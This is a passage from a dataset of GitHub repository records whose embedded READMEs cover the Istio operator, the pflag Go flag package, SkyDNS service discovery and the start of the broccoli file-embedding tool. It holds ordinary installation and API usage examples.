README](#in-this-readme)\n - [Istio operator vs Calisti](#istio-operator-vs-calisti)\n - [Getting started](#getting-started)\n - [Prerequisites](#prerequisites)\n - [Build and deploy](#build-and-deploy)\n - [Issues, feature requests](#issues-feature-requests)\n - [Contributing](#contributing)\n - [Got stuck? 
Find help!](#got-stuck-find-help)\n - [Community support](#community-support)\n - [Engineering blog](#engineering-blog)\n - [License](#license)\n\n## Istio operator vs [Calisti](https://calisti.app/)\n\n[Calisti](https://calisti.app/) is an enterprise ready Istio platform for DevOps and SREs that automates lifecycle management and simplifies connectivity, security & observability for microservice based applications.\nThe Cisco Istio operator is a core part of Calisti's Service Mesh Manager (SMM) component, which helps with installing, upgrading and managing an Istio mesh, but SMM provides many other components to conveniently secure, operate and observe Istio as well.\n\nThe differences are presented in this table:\n\n| | Istio operator | Cisco Service Mesh Manager |\n|:-------------------------:|:-----------------------:|:--------------------------:|\n| Install Istio | :heavy_check_mark: | :heavy_check_mark: |\n| Manage Istio | :heavy_check_mark: | :heavy_check_mark: |\n| Upgrade Istio | :heavy_check_mark: | :heavy_check_mark: |\n| Uninstall Istio | :heavy_check_mark: | :heavy_check_mark: |\n| Multiple gateways support | :heavy_check_mark: | :heavy_check_mark: |\n| Multi cluster support | needs some manual steps | fully automatic |\n| Prometheus | | :heavy_check_mark: |\n| Grafana | | :heavy_check_mark: |\n| Jaeger | | :heavy_check_mark: |\n| Cert manager | | :heavy_check_mark: |\n| Dashboard | | :heavy_check_mark: |\n| CLI | | :heavy_check_mark: |\n| OIDC authentication | | :heavy_check_mark: |\n| VM integration | | :heavy_check_mark: |\n| Topology graph | | :heavy_check_mark: |\n| Outlier detection | | :heavy_check_mark: |\n| Service Level Objectives | | :heavy_check_mark: |\n| Live access logs | | :heavy_check_mark: |\n| mTLS management | | :heavy_check_mark: |\n| Gateway management | | :heavy_check_mark: |\n| Istio traffic management | | :heavy_check_mark: |\n| Validations | | :heavy_check_mark: |\n| Support | Community | Enterprise |\n\nFor a complete list of SMM features please check out the [SMM docs](https://smm-docs.eticloud.io/docs/).\n\n## Getting started\n\n### Prerequisites\n- kubectl installed\n- kubernetes cluster (version 1.22+)\n- active kubecontext to the kubernetes cluster\n\n### Build and deploy\nDownload or check out the latest stable release.\n\nRun `make deploy` to deploy the operator controller-manager on your kubernetes cluster.\n\nCheck if the controller is running in the `istio-system` namespace:\n```\n$ kubectl get pod -n istio-system\n\nNAME READY STATUS RESTARTS AGE\nistio-operator-controller-manager-6f764787c-rbnht 2/2 Running 0 5m18s\n```\n\nDeploy the [Istio control plane sample](config/samples/servicemesh_v1alpha1_istiocontrolplane.yaml) to the `istio-system` namespace\n```\n$ kubectl -n istio-system apply -f config/samples/servicemesh_v1alpha1_istiocontrolplane.yaml\nistiocontrolplane.servicemesh.cisco.com/icp-v116x-sample created\n```\n\nLabel the namespace, where you would like to enable sidecar injection for your pods. 
The label should consist of the name of the deployed IstioControlPlane and the namespace where it is deployed.\n```\n$ kubectl label namespace demoapp istio.io/rev=icp-v116x-sample.istio-system\nnamespace/demoapp labeled\n```\n\nDeploy the [Istio ingress gateway sample](config/samples/servicemesh_v1alpha1_istiomeshgateway.yaml) to your desired namespace\n```\n$ kubectl -n demoapp apply -f config/samples/servicemesh_v1alpha1_istiomeshgateway.yaml\nistiomeshgateway.servicemesh.cisco.com/imgw-sample created\n```\n\nDeploy your application (or the [sample bookinfo app](https://raw.githubusercontent.com/istio/istio/master/samples/bookinfo/platform/kube/bookinfo.yaml)).\n```\n$ kubectl -n demoapp apply -f https://raw.githubusercontent.com/istio/istio/master/samples/bookinfo/platform/kube/bookinfo.yaml\nservice/details created\nserviceaccount/bookinfo-details created\ndeployment.apps/details-v1 created\nservice/ratings created\nserviceaccount/bookinfo-ratings created\ndeployment.apps/ratings-v1 created\nservice/reviews created\nserviceaccount/bookinfo-reviews created\ndeployment.apps/reviews-v1 created\ndeployment.apps/reviews-v2 created\ndeployment.apps/reviews-v3 created\nservice/productpage created\nserviceaccount/bookinfo-productpage created\ndeployment.apps/productpage-v1 created\n```\n\nVerify that all applications pods are running and have the sidecar proxy injected. The READY column shows the number of containers for the pod: this should be 1/1 for the gateway, and at least 2/2 for the other pods (the original container of the pods + the sidecar container).\n```\n$ kubectl get pod -n demoapp\nNAME READY STATUS RESTARTS AGE\ndetails-v1-79f774bdb9-8xqwj 2/2 Running 0 35s\nimgw-sample-66555d5b84-kv62w 1/1 Running 0 7m21s\nproductpage-v1-6b746f74dc-cx6x6 2/2 Running 0 33s\nratings-v1-b6994bb9-g9vm2 2/2 Running 0 35s\nreviews-v1-545db77b95-rdmsp 2/2 Running 0 34s\nreviews-v2-7bf8c9648f-rzmvj 2/2 Running 0 34s\nreviews-v3-84779c7bbc-t5rfq 2/2 Running 0 33s\n```\n\nDeploy the VirtualService and Gateway needed for your application.\n**For the [demo bookinfo](https://raw.githubusercontent.com/istio/istio/master/samples/bookinfo/networking/bookinfo-gateway.yaml) application, you need to modify the Istio Gateway entry!** The `spec.selector.istio` field should be set from `ingressgateway` to `imgw-sample` so it will be applied to the sample IstioMeshGateway deployed before. 
The port needs to be set to the targetPort of the deployed IstioMeshGateway.\n```\ncurl https://raw.githubusercontent.com/istio/istio/master/samples/bookinfo/networking/bookinfo-gateway.yaml | sed 's/istio: ingressgateway # use istio default controller/istio: imgw-sample/g;s/number: 80/number: 9080/g' | kubectl apply -f -\n```\n```\n$ kubectl -n demoapp apply -f bookinfo-gateway.yaml\ngateway.networking.istio.io/bookinfo-gateway created\nvirtualservice.networking.istio.io/bookinfo created\n```\n\nTo access your application, use the public IP address of the `imgw-sample` LoadBalancer service.\n```\n$ IP=$(kubectl -n demoapp get svc imgw-sample -o jsonpath='{.status.loadBalancer.ingress[0].ip}')\n$ curl -I $IP/productpage\nHTTP/1.1 200 OK\ncontent-type: text/html; charset=utf-8\ncontent-length: 4183\nserver: istio-envoy\ndate: Mon, 02 May 2022 14:20:49 GMT\nx-envoy-upstream-service-time: 739\n```\n\n## Issues, feature requests\n\nPlease note that the Istio operator is constantly under development and new releases might introduce breaking changes.\nWe are striving to keep backward compatibility as much as possible while adding new features at a fast pace.\nIssues, new features or bugs are tracked on the projects [GitHub page](https://github.com/banzaicloud/istio-operator/issues) - please feel free to add yours!\n\n## Contributing\n\nIf you find this project useful here's how you can help:\n\n- Send a pull request with your new features and bug fixes\n- Help new users with issues they may encounter\n- Support the development of this project and star this repo!\n\n## Got stuck? Find help!\n\n### Community support\n\nIf you encounter any problems that is not addressed in our documentation, [open an issue](https://github.com/banzaicloud/istio-operator/issues) or talk to us on the [Banzai Cloud Slack channel #istio-operator.](https://pages.banzaicloud.com/invite-slack).\n\n### Engineering blog\n\nWe occasionally write blog posts about [Istio](https://ciscotechblog.com/tags/istio/) itself and the [Istio operator](https://ciscotechblog.com/tags/istio-operator/).\n\n## License\n\nCopyright (c) 2021 Cisco Systems, Inc. and/or its affiliates\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n[http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "ogier/pflag", "link": "https://github.com/ogier/pflag", "tags": [], "stars": 527, "description": "Drop-in replacement for Go's flag package, implementing POSIX/GNU-style --flags.", "lang": "Go", "repo_lang": "", "readme": "[![Build Status](https://travis-ci.org/ogier/pflag.png?branch=master)](https://travis-ci.org/ogier/pflag)\n\n## Description\n\npflag is a drop-in replacement for Go's flag package, implementing\nPOSIX/GNU-style --flags.\n\npflag is compatible with the [GNU extensions to the POSIX recommendations\nfor command-line options][1]. 
For a more precise description, see the\n\"Command-line flag syntax\" section below.\n\n[1]: http://www.gnu.org/software/libc/manual/html_node/Argument-Syntax.html\n\npflag is available under the same style of BSD license as the Go language,\nwhich can be found in the LICENSE file.\n\n## Installation\n\npflag is available using the standard `go get` command.\n\nInstall by running:\n\n go get github.com/ogier/pflag\n\nRun tests by running:\n\n go test github.com/ogier/pflag\n\n## Usage\n\npflag is a drop-in replacement for Go's native flag package. If you import\npflag under the name \"flag\" then all code should continue to function\nwith no changes.\n\n``` go\nimport flag \"github.com/ogier/pflag\"\n```\n\nThere is one exception to this: if you directly instantiate the Flag struct\nthere is one more field \"Shorthand\" that you will need to set.\nMost code never instantiates this struct directly, and instead uses\nfunctions such as String(), BoolVar(), and Var(), and is therefore\nunaffected.\n\nDefine flags using flag.String(), Bool(), Int(), etc.\n\nThis declares an integer flag, -flagname, stored in the pointer ip, with type *int.\n\n``` go\nvar ip *int = flag.Int(\"flagname\", 1234, \"help message for flagname\")\n```\n\nIf you like, you can bind the flag to a variable using the Var() functions.\n\n``` go\nvar flagvar int\nfunc init() {\n flag.IntVar(&flagvar, \"flagname\", 1234, \"help message for flagname\")\n}\n```\n\nOr you can create custom flags that satisfy the Value interface (with\npointer receivers) and couple them to flag parsing by\n\n``` go\nflag.Var(&flagVal, \"name\", \"help message for flagname\")\n```\n\nFor such flags, the default value is just the initial value of the variable.\n\nAfter all flags are defined, call\n\n``` go\nflag.Parse()\n```\n\nto parse the command line into the defined flags.\n\nFlags may then be used directly. If you're using the flags themselves,\nthey are all pointers; if you bind to variables, they're values.\n\n``` go\nfmt.Println(\"ip has value \", *ip)\nfmt.Println(\"flagvar has value \", flagvar)\n```\n\nAfter parsing, the arguments after the flag are available as the\nslice flag.Args() or individually as flag.Arg(i).\nThe arguments are indexed from 0 through flag.NArg()-1.\n\nThe pflag package also defines some new functions that are not in flag,\nthat give one-letter shorthands for flags. You can use these by appending\n'P' to the name of any function that defines a flag.\n\n``` go\nvar ip = flag.IntP(\"flagname\", \"f\", 1234, \"help message\")\nvar flagvar bool\nfunc init() {\n flag.BoolVarP(&flagvar, \"boolname\", \"b\", true, \"help message\")\n}\nflag.VarP(&flagVal, \"varname\", \"v\", \"help message\")\n```\n\nShorthand letters can be used with single dashes on the command line.\nBoolean shorthand flags can be combined with other shorthand flags.\n\nThe default set of command-line flags is controlled by\ntop-level functions. The FlagSet type allows one to define\nindependent sets of flags, such as to implement subcommands\nin a command-line interface. The methods of FlagSet are\nanalogous to the top-level functions for the command-line\nflag set.\n\n## Command line flag syntax\n\n```\n--flag // boolean flags only\n--flag=x\n```\n\nUnlike the flag package, a single dash before an option means something\ndifferent than a double dash. Single dashes signify a series of shorthand\nletters for flags. 
All but the last shorthand letter must be boolean flags.\n\n```\n// boolean flags\n-f\n-abc\n\n// non-boolean flags\n-n 1234\n-Ifile\n\n// mixed\n-abcs \"hello\"\n-abcn1234\n```\n\nFlag parsing stops after the terminator \"--\". Unlike the flag package,\nflags can be interspersed with arguments anywhere on the command line\nbefore this terminator.\n\nInteger flags accept 1234, 0664, 0x1234 and may be negative.\nBoolean flags (in their long form) accept 1, 0, t, f, true, false,\nTRUE, FALSE, True, False.\nDuration flags accept any input valid for time.ParseDuration.\n\n## More info\n\nYou can see the full reference documentation of the pflag package\n[at godoc.org][3], or through go's standard documentation system by\nrunning `godoc -http=:6060` and browsing to\n[http://localhost:6060/pkg/github.com/ogier/pflag][2] after\ninstallation.\n\n[2]: http://localhost:6060/pkg/github.com/ogier/pflag\n[3]: http://godoc.org/github.com/ogier/pflag\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "skynetservices/skydns1", "link": "https://github.com/skynetservices/skydns1", "tags": [], "stars": 527, "description": "DNS for skynet or any other service discovery", "lang": "Go", "repo_lang": "", "readme": "#SkyDNS2\n\nThis is an heads up that this version of SkyDNS is going to be replaced by\n[SkyDNS2](https://github.com/skynetservices/skydns) which is backed by etcd.\n\n*This* version will then be available under .\n\nThings are different in version 2, so please try it and report back any problems, success\nstories or whatever. You can report issues here or in the skydns2 repository.\n\nWe expect this change to take place somewhere mid May 2014, unless issues pop up.\n\n#SkyDNS [![Build Status](https://travis-ci.org/skynetservices/skydns1.png)](https://travis-ci.org/skynetservices/skydns1)\n*Version 0.2.0*\n\nSkyDNS is a distributed service for announcement and discovery of services. It\nleverages Raft for high-availability and consensus, and utilizes DNS queries\nto discover available services. This is done by leveraging SRV records in DNS,\nwith special meaning given to subdomains, priorities and weights.\n\nSkyDNS will also act as a forwarding DNS proxy, so that you can set your SkyDNS\ninstance as the primary DNS service in /etc/resolv.conf and SkyDNS will forward\nand proxy requests for which it is not authoritative.\n\nBesides serving SRV records, which include *all* the information you need to\nconnect to your service, SkyDNS will also return A records. This is useful if\nyou already know what port a particular service is using, and you just want a\nlist of IP addresses with known running instances.\n\n[Announcement Blog Post](http://blog.gopheracademy.com/skydns)\n\n##Setup / Install\n\nCompile SkyDNS, and execute it\n\n`go get -d -v ./... && go build -v ./...`\n\n`./skydns`\n\nWhich takes the following flags\n- -domain - This is the domain requests are anchored to and should be appended to all requests (Defaults to: skydns.local)\n- -http - This is the HTTP ip:port to listen on for API request (Defaults to: 127.0.0.1:8080)\n- -dns - This is the ip:port to listen on for DNS requests (Defaults to: 127.0.0.1:53)\n- -data - Directory that Raft logs will be stored in (Defaults to: ./data)\n- -join - When running a cluster of SkyDNS servers as recommended, you'll need to supply followers with where the other members can be found, this can be any member or a comma separated list of members. 
It does not have to be the leader. Any non-leader you join will redirect you to the leader automatically.\n- -discover - This flag can be used in place of explicitly supplying cluster members via the -join flag. It performs a DNS lookup using the hosts DNS server for NS records associated with the -domain flag to find the SkyDNS instances.\n- -metricsToStdErr - When this flag is set to true, metrics will be periodically written to standard error\n- -graphiteServer - When this flag is set to a Graphite Server URL:PORT, metrics will be posted to a graphite server\n- -stathatUser - When this flag is set to a valid StatHat user, metrics will be posted to that user's StatHat account periodically\n- -secret - When this variable is set, the HTTP api will require an authorization header that matches the secret passed to skydns when it starts\n- -nameserver - Nameserver address to forward (non-local) queries to e.g. \"8.8.8.8:53,8.8.4.4:53\", in other words an IP:PORT, where multiple nameservers maybe listed separated by a comma \"`,`\". If this list is empty (\"\"),\nSkyDNS will parse /etc/resolv.conf and will use the nameservers listed there.\n- -tlskey - The path to the secret key to unlock your ssl cert.\n- -tlspem - The path to the X509 certificate that will secure skydns.\n\n##API\n### Service Announcements\nYou announce your service by submitting JSON over HTTP to SkyDNS with information about your service.\nThis information will then be available for queries either via DNS or HTTP.\n\nWhen providing information you will need to fill out the following values. Note you are free to use\nwhatever you like, so take the following list as a guide only.\n\n* Name - The name of your service, e.g., \"rails\", \"web\" or anything else you like\n* Version - A version string, note the dots in this string are translated to hyphens when\n querying via the DNS\n* Environment - Can be something as \"production\" or \"testing\"\n* Region - Where do these hosts live, e.g. \"east\", \"west\" or even \"test\"\n* Host, Port and TTL - Denote the actuals hosts and how long (TTL) this information is valid.\n\nWhen queried SkyDNS will return records containing these elements in the following\norder:\n\n ......skydns.local\n\nWhere `` is the identifier used when registering this host and service. And also\nnote the `` corresponds with the Name given above.\n\nNote some of these elements may contain a wildcard or be left out completely,\nsee the section named \"Wildcards\" below for more information.\n\n#### Without Shared Secret\n`curl -X PUT -L http://localhost:8080/skydns/services/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"Test\",\"Host\":\"web1.site.com\",\"Port\":9000,\"TTL\":10}'`\n\n#### With Shared Secret\nYou have the ability to use a shared secret with SkyDns. To take advantage of the shared secret you would start skydns with the -secret= flag.\n`curl -X PUT -H \"Authorization mysupersecretsharedsecret\" -L http://localhost:8080/skydns/services/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"Test\",\"Host\":\"web1.site.com\",\"Port\":9000,\"TTL\":10}'`\n\nIf unsuccessful you should receive an HTTP status code of: **401 Unauthorized**\n\n#### Starting with TLS\nIf you supply the flags --tls-key and --tls-pem Skydns will assume your http interface should be tls. 
To start with tls it should look something like this.\n\n```bash\ngo run main.go --tls-key=/path/to/secret.key --tls-pem=/path/to/cert.pem\n\n```\n\n#### Result\n\nIf successful you should receive an HTTP status code of: **201 Created**\n\nIf a service with this UUID already exists you will receive back an HTTP status\ncode of: **409 Conflict**\n\nSkyDNS will now have an entry for your service that will live for the number\nof seconds supplied in your TTL (10 seconds in our example), unless you send a\nheartbeat to update the TTL.\n\nNote that instead of a hostname you can also use an IP address (IPv4 or IPv6),\nin that case SkyDNS will make up a hostname that is used in the SRV record\n(defaults to UUID.skydns.local) and adds the IP address as an A or AAAA record\nin the additional section for this hostname.\n\n### Heartbeat / Keep alive\nSkyDNS requires that services submit an HTTP request to update their TTL within\nthe TTL they last supplied. If the service fails to do so within this timeframe\nSkyDNS will expire the service automatically. This will allow for nodes to fail\nand DNS to reflect this quickly.\n\nYou can update your TTL by sending an HTTP request to SkyDNS with an updated\nTTL; it can be the same as before to allow it to live for another 10s, or it can\nbe adjusted to a shorter or longer duration.\n\n`curl -X PATCH -L http://localhost:8080/skydns/services/1001 -d '{\"TTL\":10}'`\n\n### Service Removal\nIf you wish to remove your service from SkyDNS for any reason without waiting for the TTL to expire, you simply send an HTTP DELETE.\n\n`curl -X DELETE -L http://localhost:8080/skydns/services/1001`\n\n### Retrieve Service Info via API\nCurrently you may only retrieve a service's info by the UUID of the service; in the\nfuture we may implement querying of the services similar to the DNS interface.\n\n`curl -X GET -L http://localhost:8080/skydns/services/1001`\n\n### Call backs\nRegistering a call back is similar to registering a service. A service that\nregisters a call back will receive an HTTP request. Every time something changes\nin the service, the callback is executed; currently callbacks are only made when the\nservice is deleted.\n\n`curl -X PUT -L http://localhost:8080/skydns/callbacks/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"Test\",\"Host\":\"web1.site.com\",\"Reply\":\"web2.example.nl\",\"Port\":5441}'`\n\nThis will result in the call back being sent to `web2.example.nl` on port 5441. The\ncallback itself will be an HTTP DELETE:\n\n`curl -X DELETE -L http://web2.example.nl:5441/skydns/callbacks/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"Test\",\"Host\":\"web1.site.com\"}'`\n\n##Discovery (DNS)\nYou can find services by querying SkyDNS via any DNS client or utility. 
It uses a known domain syntax with wildcards to find matching services.\n\nPriorities and Weights are based on the requested Region, as well as how many nodes are available matching the current request in the given region.\n\n###Domain Format\nThe domain syntax when querying follows a pattern where the right\nmost positions are more generic, than the subdomains to their left:\n*\\.\\.\\.\\.\\.\\.skydns.local*.\nThis allows for you to supply only the positions you care about:\n\n- authservice.production.skydns.local - For instance would return all services with the name AuthService in the production environment, regardless of the Version, Region, or Host\n- 1-0-0.authservice.production.skydns.local - Is the same as above but restricting it to only version 1.0.0\n- east.1-0-0.authservice.production.skydns.local - Would add the restriction that the services must be running in the East region\n\n#### Wildcards\n\nIn addition to only needing to specify as much of the domain as required for the granularity level you're looking for, you may also supply the wildcard `*` in any of the positions.\n\n- east.*.*.production.skydns.local - Would return all services in the East region, that are a part of the production environment.\n\n###Examples\n\nLet's take a look at some results. First we need to add a few services so we have services to query against.\n\n\t// Service 1001 (East Region)\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1001 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"East\",\"Host\":\"web1.site.com\",\"Port\":80,\"TTL\":4000}'\n\n\t// Service 1002 (East Region)\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1002 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"East\",\"Host\":\"web2.site.com\",\"Port\":8080,\"TTL\":4000}'\n\n\t// Service 1003 (West Region)\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1003 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"West\",\"Host\":\"web3.site.com\",\"Port\":80,\"TTL\":4000}'\n\n\t// Service 1004 (West Region)\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1004 -d '{\"Name\":\"TestService\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"West\",\"Host\":\"web4.site.com\",\"Port\":80,\"TTL\":4000}'\n\nNow we can try some of our example DNS lookups:\n#####All services in the Production Environment\n`dig @localhost production.skydns.local SRV`\n\n\t;; QUESTION SECTION:\n\t;production.skydns.local.\t\t\tIN\tSRV\n\n\t;; ANSWER SECTION:\n\tproduction.skydns.local.\t\t629\t\tIN\tSRV\t10 20 80 web1.site.com.\n\tproduction.skydns.local.\t\t3979\tIN\tSRV\t10 20 8080 web2.site.com.\n\tproduction.skydns.local.\t\t3629\tIN\tSRV\t10 20 9000 server24.\n\tproduction.skydns.local.\t\t3985\tIN\tSRV\t10 20 80 web3.site.com.\n\tproduction.skydns.local.\t\t3990\tIN\tSRV\t10 20 80 web4.site.com.\n\n#####All TestService instances in Production Environment\n`dig @localhost testservice.production.skydns.local SRV`\n\n\t;; QUESTION SECTION:\n\t;testservice.production.skydns.local.\t\tIN\tSRV\n\n\t;; ANSWER SECTION:\n\ttestservice.production.skydns.local.\t615\t\tIN\tSRV\t10 20 80 web1.site.com.\n\ttestservice.production.skydns.local.\t3966\tIN\tSRV\t10 20 8080 web2.site.com.\n\ttestservice.production.skydns.local.\t3615\tIN\tSRV\t10 20 9000 server24.\n\ttestservice.production.skydns.local.\t3972\tIN\tSRV\t10 20 80 
web3.site.com.\n\ttestservice.production.skydns.local.\t3976\tIN\tSRV\t10 20 80 web4.site.com.\n\n#####All TestService v1.0.0 Instances in Production Environment\n`dig @localhost 1-0-0.testservice.production.skydns.local SRV`\n\n\t;; QUESTION SECTION:\n\t;1-0-0.testservice.production.skydns.local.\tIN\tSRV\n\n\t;; ANSWER SECTION:\n\t1-0-0.testservice.production.skydns.local. 600 IN\tSRV\t10 20 80 web1.site.com.\n\t1-0-0.testservice.production.skydns.local. 3950 IN\tSRV\t10 20 8080 web2.site.com.\n\t1-0-0.testservice.production.skydns.local. 3600 IN\tSRV\t10 20 9000 server24.\n\t1-0-0.testservice.production.skydns.local. 3956 IN\tSRV\t10 20 80 web3.site.com.\n\t1-0-0.testservice.production.skydns.local. 3961 IN\tSRV\t10 20 80 web4.site.com.\n\n#####All TestService Instances at any version, within the East region\n`dig @localhost east.*.testservice.production.skydns.local SRV`\n\nThis is where we've changed things up a bit, notice we used the \"*\" wildcard for\nversion so we get any version, and because we've supplied an explicit region\nthat we're looking for we get that as the highest DNS priority, with the weight\nbeing distributed evenly, then all of our West instances still show up for\nfail-over, but with a higher Priority.\n\n\t;; QUESTION SECTION:\n\t;east.*.testservice.production.skydns.local. IN\tSRV\n\n\t;; ANSWER SECTION:\n\teast.*.testservice.production.skydns.local. 531 IN SRV\t10 50 80 web1.site.com.\n\teast.*.testservice.production.skydns.local. 3881 IN SRV\t10 50 8080 web2.site.com.\n\teast.*.testservice.production.skydns.local. 3531 IN SRV\t20 33 9000 server24.\n\teast.*.testservice.production.skydns.local. 3887 IN SRV\t20 33 80 web3.site.com.\n\teast.*.testservice.production.skydns.local. 3892 IN SRV\t20 33 80 web4.site.com.\n\n\n####A Records\nTo return A records, simply run a normal DNS query for a service matching the above patterns.\n\nLet's add some web servers to SkyDNS:\n\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1011 -d '{\"Name\":\"rails\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"East\",\"Host\":\"127.0.0.10\",\"Port\":80,\"TTL\":400000}'\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1012 -d '{\"Name\":\"rails\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"East\",\"Host\":\"127.0.0.11\",\"Port\":80,\"TTL\":400000}'\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1013 -d '{\"Name\":\"rails\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"West\",\"Host\":\"127.0.0.12\",\"Port\":80,\"TTL\":400000}'\n\tcurl -X PUT -L http://localhost:8080/skydns/services/1014 -d '{\"Name\":\"rails\",\"Version\":\"1.0.0\",\"Environment\":\"Production\",\"Region\":\"West\",\"Host\":\"127.0.0.13\",\"Port\":80,\"TTL\":400000}'\n\nNow do a normal DNS query:\n`dig rails.production.skydns.local`\n\n\t;; QUESTION SECTION:\n\t;rails.production.skydns.local.\tIN\tA\n\n\t;; ANSWER SECTION:\n\trails.production.skydns.local. 399918 IN A\t127.0.0.10\n\trails.production.skydns.local. 399918 IN A\t127.0.0.11\n\trails.production.skydns.local. 399918 IN A\t127.0.0.12\n\trails.production.skydns.local. 399919 IN A\t127.0.0.13\n\nNow you have a list of all known IP Addresses registered running the `rails`\nservice name. Because we're returning A records and not SRV records, there\nare no ports listed, so this is only useful when you're querying for services\nrunning on ports known to you in advance. 
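The same A record lookup can also be done programmatically. Below is a minimal sketch in Go that assumes SkyDNS is listening on 127.0.0.1:53 as in the examples above; the choice of the third-party `github.com/miekg/dns` client library is only illustrative, any DNS client will do:\n\n```go\npackage main\n\nimport (\n    \"fmt\"\n    \"log\"\n\n    \"github.com/miekg/dns\"\n)\n\nfunc main() {\n    c := new(dns.Client)\n    m := new(dns.Msg)\n    // Same name as the dig example: all known instances of the rails service.\n    m.SetQuestion(\"rails.production.skydns.local.\", dns.TypeA)\n\n    r, _, err := c.Exchange(m, \"127.0.0.1:53\")\n    if err != nil {\n        log.Fatal(err)\n    }\n    for _, rr := range r.Answer {\n        if a, ok := rr.(*dns.A); ok {\n            fmt.Println(a.A) // one IP address per registered instance\n        }\n    }\n}\n```\n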
Notice, we didn't specify version or\nregion, but we could have.\n\n####DNS Forwarding\n\nBy specifying `-nameserver=\"8.8.8.8:53,8.8.4.4:53\"` on the `skydns` command line,\nyou create a DNS forwarding proxy. In this case it round-robins between the two\nnameserver IPs mentioned on the command line.\n\nRequests for which SkyDNS isn't authoritative\nwill be forwarded and proxied back to the client. This means that you can set\nSkyDNS as the primary DNS server in `/etc/resolv.conf` and use it for both service\ndiscovery and normal DNS operations.\n\n*Please test this before relying on it in production, as there may be edge cases that don't work as planned.*\n\n####DNSSEC\n\nSkyDNS supports signing DNS answers (also known as DNSSEC). To use it you need to\ncreate a DNSSEC keypair and use that in SkyDNS. For instance if the domain for\nSkyDNS is `skydns.local`:\n\n dnssec-keygen skydns.local\n Generating key pair............++++++ ...................................++++++\n Kskydns.local.+005+49860\n\nThis creates two files, both with the basename `Kskydns.local.+005+49860`: one with the\nextension `.key` (this holds the public key) and one with the extension `.private`, which\nholds the private key. The basename of this file should be given to SkyDNS's -dnssec\noption: `-dnssec=Kskydns.local.+005+49860`\n\nIf you then query with `dig +dnssec` you will get signatures, keys and NSEC records returned.\n\n## License\nThe MIT License (MIT)\n\nCopyright \u00a9 2014 The SkyDNS Authors\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n", "readme_type": "markdown", "hn_comments": "Looks pretty cool. I think DNS, and particularly SRV records, unfortunately get overlooked as a simple tool for internal service discovery.Great to see an etcd backend. Nice work.One feature I'd love to see is support for an etcd discovery URL (versus having to provide an explicit list of peers). 
See: http://coreos.com/docs/cluster-management/setup/etcd-cluster...", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "thealetheia/broccoli", "link": "https://github.com/thealetheia/broccoli", "tags": [], "stars": 527, "description": "Using brotli compression to embed static files in Go.", "lang": "Go", "repo_lang": "", "readme": "# \ud83e\udd66 Broccoli\n> `go get -u aletheia.icu/broccoli`\n\n[![GoDoc](https://godoc.org/aletheia.icu/broccoli/fs?status.svg)](https://godoc.org/aletheia.icu/broccoli/fs)\n[![Travis](https://travis-ci.org/aletheia-icu/broccoli.svg)](https://travis-ci.org/aletheia-icu/broccoli)\n[![Go Report Card](https://goreportcard.com/badge/aletheia.icu/broccoli/fs)](https://goreportcard.com/report/aletheia.icu/broccoli/fs)\n[![codecov.io](https://codecov.io/gh/aletheia-icu/broccoli/coverage.svg)](https://codecov.io/gh/aletheia-icu/broccoli)\n\nBroccoli uses [brotli](https://github.com/google/brotli) compression to embed a\nvirtual file system of static files inside Go executables.\n\nA few reasons to pick broccoli over the alternatives:\n\n- \u26a1\ufe0f On average, a 13-25% smaller binary size due to the use of a superior\ncompression algorithm, [brotli](https://github.com/google/brotli).\n- \ud83d\udcbe Broccoli supports bundling of multiple source directories, only relies on\nthe `go generate` command-line interface and doesn't require configuration files.\n- \ud83d\udd11 Optional decompression is something you may want; when it's enabled, files\nare 